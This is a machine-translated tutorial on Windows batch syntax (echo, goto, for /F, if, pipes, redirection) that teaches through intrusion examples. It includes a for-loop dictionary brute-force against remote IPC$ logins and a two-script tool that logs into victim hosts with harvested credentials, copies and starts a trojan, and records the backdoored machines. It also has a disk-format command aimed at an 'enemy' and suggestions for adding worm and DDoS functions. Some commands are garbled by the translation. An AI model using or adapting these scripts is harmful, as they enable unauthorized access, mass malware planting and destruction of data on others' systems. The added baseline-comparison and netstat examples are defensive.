Batch File Syntax

Source: Internet
Author: User

1. Introduction to simple batch processing internal commands
1. Echo command
Enables or disables command echoing, or displays a message. With no parameters, the echo command displays the current echo setting.
Syntax
echo [{on | off}] [message]
Sample: @echo off / echo Hello World
In practice, we combine this command with the redirection symbol (also known as the pipeline symbol) to write commands to a file in a specific format. This will be shown in later examples.

2. @ command
The command after @ is not displayed. During an intrusion (for example, when batch processing is used to format the enemy's hard disk), the other party cannot see the command you are using.
Sample: @ echo off
@ ECHO now initializing the program, please wait a Minite...
@ Format X:/Q/u/AutoSet (the/y parameter cannot be used for the format command. Fortunately, Microsoft keeps
Given the AutoSet parameter, the effect is the same as that of/Y .)

3. Goto command
Jumps to the specified label. After the label is found, the program processes the commands starting from the next line.
Syntax: goto label (label is a parameter that specifies the line in the batch program to jump to.)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
@rem check parameters, if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
:end
Label names can be chosen freely, but meaningful names are better. Put a colon (:) before the name to mark it as a label; the goto command uses this colon to find where to jump next. It is best to add some description so that others can understand your intent.

4. Rem command
The comment command, equivalent to /* -------- */ in the C language. It is not executed; it only serves as a comment so that others can read the file and you can modify it later.
Syntax: rem message
Sample: @rem Here is the description.

5. Pause command
When the pause command runs, the following message is displayed:
Press any key to continue...
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into drive A
pause
goto begin
In this example, all files on the disk in drive A are copied to d:\back. The displayed message prompts you to put another disk into drive A, and the pause command suspends the program so that you can change the disk and then press any key to continue processing.

6. Call Command
Calls another batch program from a batch program without terminating the parent batch program. The call command accepts a label as the target of the call. Call has no effect at the command line when it is used outside a script or batch file.
Syntax
call [[drive:][path] filename [batchparameters]] [:label [arguments]]
Parameters
[drive:][path] filename
Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.

7. Start command
Calls an external program. All DOS commands and command-line programs can be called with the start command.
Parameters commonly used in intrusion:
MIN: starts the window minimized
SEPARATE: starts a 16-bit Windows program in a separate memory space
HIGH: starts the application in the HIGH priority class
REALTIME: starts the application in the REALTIME priority class
WAIT: starts the application and waits for it to terminate
parameters: these are the parameters passed to the command/program
When the application being executed is a 32-bit GUI application, cmd.exe does not wait for the application to terminate before returning to the command prompt. This new behavior does not occur if it is executed from within a command script.

8. Choice command
Choice lets the user enter a single character and runs different commands depending on it. The /c: parameter must be given, followed (with no spaces) by the characters that may be entered. Its return codes are 1, 2, 3, 4, ...
For example: choice /c:dme defrag,mem,end
displays
defrag,mem,end[D,M,E]?
Sample:
The content of sample.bat is as follows:
@echo off
choice /c:dme defrag,mem,end
rem the highest return code must be tested first
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

After this file is run, defrag,mem,end[D,M,E]? is displayed. The user can choose D, M or E, and the if statements then decide: D runs the program segment labeled defrag, M runs the segment labeled mem, and E runs the segment labeled end. Each segment finally jumps to the end label with goto end, the program displays good bye, and the file ends.

9. If command

The if command tests whether a specified condition is met and decides which command to run. There are three formats:
1. if "parameter" == "string" command to be executed
If the parameter is equal to the specified string, the condition is true and the command is run. Otherwise, the next line is run. (Note that there are two equal signs.)
For example: if "%1"=="A" format A:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2. if exist filename command to be executed
If the specified file exists, the condition is true and the command is run. Otherwise, the next line is run.
For example: if exist config.sys edit config.sys

3. if errorlevel / if not errorlevel number command to be executed
If the return code is equal to the specified number, the condition is true and the command is run. Otherwise, the next line is run.
For example: if errorlevel 2 goto x2
When a DOS program runs, it returns a number to DOS, which is called the error code (errorlevel) or return code.
The codes are 0 and 1.

10. For command
The for command is a fairly complex command. It is mainly used to run a command repeatedly over a specified range of parameters.
When using the for command in a batch file, specify the variable as %%variable.

for {%variable | %%variable} in (set) do command [CommandLineOptions]
%variable specifies a single-letter replaceable parameter.
(set) specifies a set of one or more files. Wildcards can be used.
command specifies the command to carry out for each file.
command-parameters specifies parameters or command-line switches for the specified command.
When using the for command in a batch file, specify %%variable instead of %variable. Variable names are case sensitive, so %i is different from %I.

If command extensions are enabled, the following additional forms of the for command are supported:

for /D %variable in (set) do command [command-parameters]

If set contains wildcards, it is matched against directory names instead of file names.

for /R [[drive:]path] %variable in (set) do command [command-

Walks the directory tree rooted at [drive:]path, executing the for statement in each directory of the tree. If no directory is specified after /R, the current directory is assumed. If set is just a single period (.) character, it only enumerates the directory tree.

for /L %variable in (start,step,end) do command [command-Para

The set is a sequence of numbers from start to end, incremented by step. So (1,1,5) generates the sequence 1 2 3 4 5, and (5,-1,1) generates the sequence (5 4 3 2 1).

for /F ["options"] %variable in (file-set) do command
for /F ["options"] %variable in ("string") do command
for /F ["options"] %variable in ('command') do command

Or, if the usebackq option is present:

for /F ["options"] %variable in (file-set) do command
for /F ["options"] %variable in ('string') do command
for /F ["options"] %variable in (`command`) do command

file-set is one or more file names. Each file is opened, read and processed before moving on to the next file in file-set. Processing consists of reading the file, breaking it into individual lines of text, and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable values set to the token strings found. By default, /F passes the first blank-separated token from each line of each file. Blank lines are skipped. You can override the default parsing behavior by specifying the optional "options" parameter. This is a quoted string that contains one or more keywords specifying different parsing options. The keywords are:

eol=c - specifies an end-of-line comment character (just one).
skip=n - specifies the number of lines to skip at the beginning of the file.
delims=xxx - specifies a delimiter set. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n - specifies which tokens from each line are passed to the for body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, specifying the mth through the nth tokens. If the last character in the tokens= string is an asterisk, an additional variable is allocated and receives the remaining text on the line after the last token parsed.
usebackq - specifies that the new semantics are in force: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used to quote file names in file-set.

Sample1:
for /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

Parses each line in myfile.txt, ignoring lines that begin with a semicolon, and passes the 2nd and 3rd tokens from each line to the for body, with tokens delimited by commas and/or spaces. Note that the for body statements reference %i to get the 2nd token, %j to get the 3rd token, and %k to get all remaining tokens after the 3rd. For file names that contain spaces, you need to enclose the file name in double quotes. To use double quotes in this way, you also need the usebackq option; otherwise the double quotes are interpreted as defining a literal string to parse.

%i is explicitly declared in the for statement, and %j and %k are implicitly declared through the tokens= option. You can specify up to 26 tokens on the tokens= line, provided it does not attempt to declare a variable higher than the letter 'z' or 'Z'. Remember that for variables are single-letter, case sensitive and global, and no more than 52 can be active at any one time.

You can also use the for /F parsing logic on an immediate string, by making the file-set between the parentheses a string enclosed in single quotes. The string is then treated as a single line of input from a file.

Finally, you can use the for /F command to parse the output of a command, by making the file-set between the parentheses a back-quoted string. This string is passed as a command line to a child cmd.exe, and its output is captured into memory and parsed as if it were a file. So the following example:

for /F "usebackq delims==" %i in (`set`) do @echo %i

enumerates the names of the environment variables in the current environment.

In addition, substitution of for variable references has been enhanced. You can now use the following optional syntax:

%~I - expands %I, removing any surrounding quotation marks (")
%~fI - expands %I to a fully qualified path name
%~dI - expands %I to a drive letter only
%~pI - expands %I to a path only
%~nI - expands %I to a file name only
%~xI - expands %I to a file extension only
%~sI - the expanded path contains short names only
%~aI - expands %I to the file attributes of the file
%~tI - expands %I to the date/time of the file
%~zI - expands %I to the size of the file
%~$PATH:I - searches the directories listed in the PATH environment variable and expands %I to the fully qualified name of the first one found. If the environment variable name is not defined, or the file is not found, this modifier expands to the empty string.

You can combine modifiers to get compound results:

%~dpI - expands %I to a drive letter and path only
%~nxI - expands %I to a file name and extension only
%~fsI - expands %I to a full path name with short names only
%~dp$PATH:I - searches the directories listed in the PATH environment variable for %I and expands to the drive letter and path of the first one found
%~ftzaI - expands %I to a dir-like output line

In the preceding examples, %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid for variable name. Choosing uppercase variable names such as %I makes it easier to read and avoids confusion with the modifiers, which are not case sensitive.

The above is the official help from MS. Here are a few examples to illustrate the use of the for command in intrusion.

Sample2:

Use the for command to crack the brute-force password of a target Win2k host.
We use net use \ IP \ IPC $ "password"/u: "Administrator" to try to connect to the target host,
Write down the password when it succeeds.
The main command is: For/f I % in (dict.txt) Do net use \ IP \ IPC $ "I %"
/U: "Administrator"
Use iadminto encrypt the adminpassword, and use the net use command to connect the I % value in dict.txt. Then
Run the result in sequence and pass it to the find command --
For/f I % in (dict.txt) Do net use \ IP \ IPC $ "I %"/u: "Administrator" | find ": Life
"> D: \ OK .txt is successfully completed, so ko is finished.

Sample3:

have you ever had a large number of bots waiting for you to plant backdoors and Trojans ?, When the number is very large, one thing that was originally very happy
will become very depressing :). The Article begins with the use of batch processing files, which can simplify daily or repetitive tasks.
how can this problem be achieved? Well, you will understand it later.

there is only one main command: (when using the for command in the batch file, specify the variable to use % variable)
@ for/F "tokens =, 3 delims = "% I in (victim.txt) do start call door. bat % I % j
% K
for the tokensusage method, see the example sample1. Here, upload the content in victim.txt to
door. % I % J % K in bat.
but cultivate. bat is nothing more than using the net use command to establish an IPC $ connection, and copy the trojan + backdoor to victim,
then use the return code (if errorlever =) to filter hosts that successfully planted backdoors, and echo them out, or echo them to the
specified file.
delims = contents in vivtim.txt are separated by an empty space. I want to see that you must also understand the content in
victim.txt. It should be arranged according to the objects represented by % I % J % K, which is generally IP
password username.
Code prototype:
------------- cut here then save as a batchfile (I call it main. BAT)
-------------------------
@ echo off
@ if "% 1" = "" Goto usage
@ for/F "tokens = 1, 2, 3 delims = "% I in (victim.txt) do start call ipchack. bat % I
% J % K
@ goto end
: usage
@ echo run this batch in DOS modle. or just double-click it.
: End
------------- cut here then save as a batchfile (I call it main. BAT)
---------------------------

----------------- Cut here then save as a batchfile (I call it door. BAT)
-----------------------------
@ Net use \ % 1 \ IPC $ % 3/u: "% 2"
@ If errorlevel 1 goto failed
@ Echo trying to establish the IPC $ connection ............ OK
@ Copy windrv32.exe \ % 1 \ ADMIN $ \ system32 & if not errorlevel 1 echo IP % 1 USER % 2 pwd
% 3> ko.txt
@ Export xec \ % 1 c: \ winnt \ system32 \ windrv32.exe
@ Export xec \ % 1 Net start windrv32 & if not errorlevel 1 echo % 1 backdoored> ko.txt
: Failed
@ Echo sorry can not connected to the victim.
----------------- Cut here then save as a batchfile (I call it door. BAT)
--------------------------------
This is just an example of automatic post-planting door batch processing, two batch processing and post-door program (windrv32.exe.pdf, using xec.exe
Must be placed in a unified directory. Batch Processing content
Still scalable, such as adding the log clearing + DDoS function and adding the user's function at regular intervals.
The automatic propagation function (worm) is available. We will not describe it here. If you are interested, you can study it on your own.

2. How to use parameters in batch files
Parameters can be used in batch files, generally %1 to %9. When there are more parameters, shift is needed; this is rare, so we will not cover it.
Sample1: fomat. bat
@ Echo off
If "% 1" = "A" format:
: Format
@ Format A:/Q/u/auotset
@ Echo Please insert another disk to driver.
@ Pause
@ Goto fomat
This example formats several floppy disks in a row, so it must be run as fomat.bat a in the DOS window. It seems a little superfluous ^_^
Sample2:
When we want to establish an IPC $ connection location, we always need to input a large number of commands. If this is not the case, we will make a mistake.
Some fixed commands are written into a batch, and the IP password username of the BOT farm is assigned to the batch in front of the parameter.
In this way, you don't have to execute commands every time.
@ Echo off
@ Net use \ 1% \ IPC $ "2%"/u: "3%" NOTE: Here password is the second parameter.
@ If errorlevel 1 echo connection failed
How about using parameters? You must have learned ^_^.

3. How to use compound commands

1. &

Usage: first command & second command [& third command...]

This method runs several commands on one line, regardless of whether each command is successfully executed.

Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

<DIR> .
<DIR> ..
14 sometips.gif

2. &&

Usage: first command && second command [&& third command...]

This method runs several commands on one line. When a command fails, the commands after it are not executed. If no error occurs, all commands are executed.

Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.

C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\Ex4rch

<DIR> .
<DIR> ..
14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

This command can keep a backup step simple, for example:
dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb E:\backup
If the backup.mdb file exists on the remote server, the copy command is run. If the file does not exist, the copy command is not run. This method can replace if exist :)

3. ||

Usage: first command || second command [|| third command...]

This method runs several commands on one line. Once a command executes correctly, the commands after it are not executed. If no command executes correctly, all the commands are executed.

Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:\Ex4rch

14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

Examples of combined commands:
Sample:
@ Copy trojan.exe \ % 1 \ ADMIN $ \ system32 & if not errorlevel 1 echo IP % 1 USER % 2 pass
% 3> victim.txt

4. Use of pipeline commands

1. | command
Usage: first command | second command [| third command...]
Passes the output of the first command to the second command as its input. This method is very common in UNIX.

Sample:
time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
See it? Terminal Services lets us set a custom startup program for a user. By having the user run this bat at logon, we obtain the IP address of the logon user.
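
An added example, not from the original page: the for /F options described in the For command section (eol, tokens, the default delimiters, usebackq) and the %~ modifiers, applied to the kind of netstat lines the bat above logs. The netstat lines are constructed sample data using documentation addresses; the temporary file name and the :check label are assumptions of the example.

```batch
@echo off
setlocal
rem Constructed sample: saved "netstat -n -p tcp" lines (documentation addresses).
rem The file name contains spaces on purpose, to show why usebackq is needed.
set "DATA=%TEMP%\netstat demo %RANDOM%.txt"
> "%DATA%" echo ; constructed capture - this line is skipped because of eol=;
>> "%DATA%" echo   TCP    10.0.0.5:3389    203.0.113.7:51515     ESTABLISHED
>> "%DATA%" echo   TCP    10.0.0.5:445     10.0.0.9:49822        ESTABLISHED
>> "%DATA%" echo   TCP    10.0.0.5:3389    198.51.100.23:60211   TIME_WAIT

rem Default delimiters (space and tab). tokens=2,3* gives:
rem   %%I = local address, %%J = remote address, %%K = rest of the line (state).
rem usebackq makes the double-quoted name a file name, not a literal string.
for /f "usebackq eol=; tokens=2,3*" %%I in ("%DATA%") do call :check %%I %%J %%K

rem %%~ modifiers applied to the data file itself.
for %%F in ("%DATA%") do echo parsed %%~nxF (%%~zF bytes) in %%~dpF

del "%DATA%"
endlocal
goto :eof

:check
rem %1 = local addr:port, %2 = remote addr:port, %3 = connection state.
rem Without usebackq, a double-quoted set is parsed as a literal string;
rem delims=: splits it into address (%%A) and port (%%B).
for /f "tokens=1,2 delims=:" %%A in ("%~1") do (
    if "%%B"=="3389" echo RDP connection from %~2 to %%A, state %~3
)
goto :eof
```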

2. >, >> output redirection commands
Redirect the output of a command or program to a specific file. The difference between > and >> is that > clears the existing content of the specified file before writing, while >> only appends the content to the specified file without changing what is already there.

Sample1:
echo Hello World>C:\hello.txt (stupid example?)

Sample2:
DLL Trojans are prevalent nowadays. We know that system32 is a good place to hide, and many Trojans head straight for it. To deal with this, after installing the system and the necessary applications we can make a record of the EXE and DLL files in this directory:
Run cmd -- change to the system32 directory -- dir *.exe>exeback.txt & dir *.dll>dllback.txt
This records the names of all EXE and DLL files separately in exeback.txt and dllback.txt.
If something abnormal is noticed later but the problem cannot be found with traditional methods, consider whether a DLL Trojan has got into the system.
In that case, use the same commands to record the EXE and DLL files under system32 to exeback1.txt and dllback1.txt, and then run:
cmd -- fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>>diff.txt
(The fc command compares the EXE and DLL lists from before and after and writes the result to diff.txt.) This shows any extra DLL and EXE files. By then checking their creation time, version and whether they are compressed, it is easier to decide whether a DLL Trojan has paid a visit. None is best.
If there is one, do not delete it directly with del. First use regsvr32 /u trojan.dll to unregister the backdoor DLL file, and then move it to the recycle bin. If the system reports no exceptions, delete it completely or submit it to an anti-virus company.
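
The recording and comparison procedure above as one script (an added example, not the original author's code). The script name baseline.bat and the baseline folder beside it are assumptions; it uses dir /b so that only file names are compared, and it tests fc's return code with if errorlevel from the highest value down, because cmd treats if errorlevel N as true for any return code of N or higher.

```batch
@echo off
setlocal
rem Added example. Usage: baseline.bat [directory]  (script name is hypothetical)
set "TARGET=%~1"
if "%TARGET%"=="" set "TARGET=%SystemRoot%\system32"
rem Assumption: snapshots are kept in a "baseline" folder beside this script.
set "BASE=%~dp0baseline"
if not exist "%BASE%" mkdir "%BASE%"

rem First run: record the baseline and stop.
if exist "%BASE%\exeback.txt" goto compare
dir /b /a-d /on "%TARGET%\*.exe" > "%BASE%\exeback.txt"
dir /b /a-d /on "%TARGET%\*.dll" > "%BASE%\dllback.txt"
echo Baseline recorded for "%TARGET%"
goto :eof

:compare
rem dir /b lists bare names, so the free-space line and timestamps of a
rem plain dir listing do not show up as differences.
dir /b /a-d /on "%TARGET%\*.exe" > "%BASE%\exeback1.txt"
dir /b /a-d /on "%TARGET%\*.dll" > "%BASE%\dllback1.txt"

rem fc returns 0 = identical, 1 = different, 2 = a file could not be opened.
rem "if errorlevel N" is true for N or higher, so test the highest code first.
set CHANGED=0
fc "%BASE%\exeback.txt" "%BASE%\exeback1.txt" > "%BASE%\diff.txt"
if errorlevel 2 goto fcfail
if errorlevel 1 set CHANGED=1
rem >> appends, so the exe result written above is not overwritten.
fc "%BASE%\dllback.txt" "%BASE%\dllback1.txt" >> "%BASE%\diff.txt"
if errorlevel 2 goto fcfail
if errorlevel 1 set CHANGED=1

if %CHANGED%==1 goto changed
echo No new or missing exe or dll names.
goto :eof

:changed
echo File list changed, review "%BASE%\diff.txt"
exit /b 1

:fcfail
echo fc could not read a snapshot file under "%BASE%"
exit /b 2
```

A name listing does not reveal a file that was replaced in place; recording hashes with certutil -hashfile alongside the names would cover that case.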

3. <, >&, <&
< reads command input from a file rather than from the keyboard.
>& writes the output of one handle to the input of another handle.
<& reads input from one handle and writes it to the output of another handle.
These are not commonly used, so we will not cover them further.
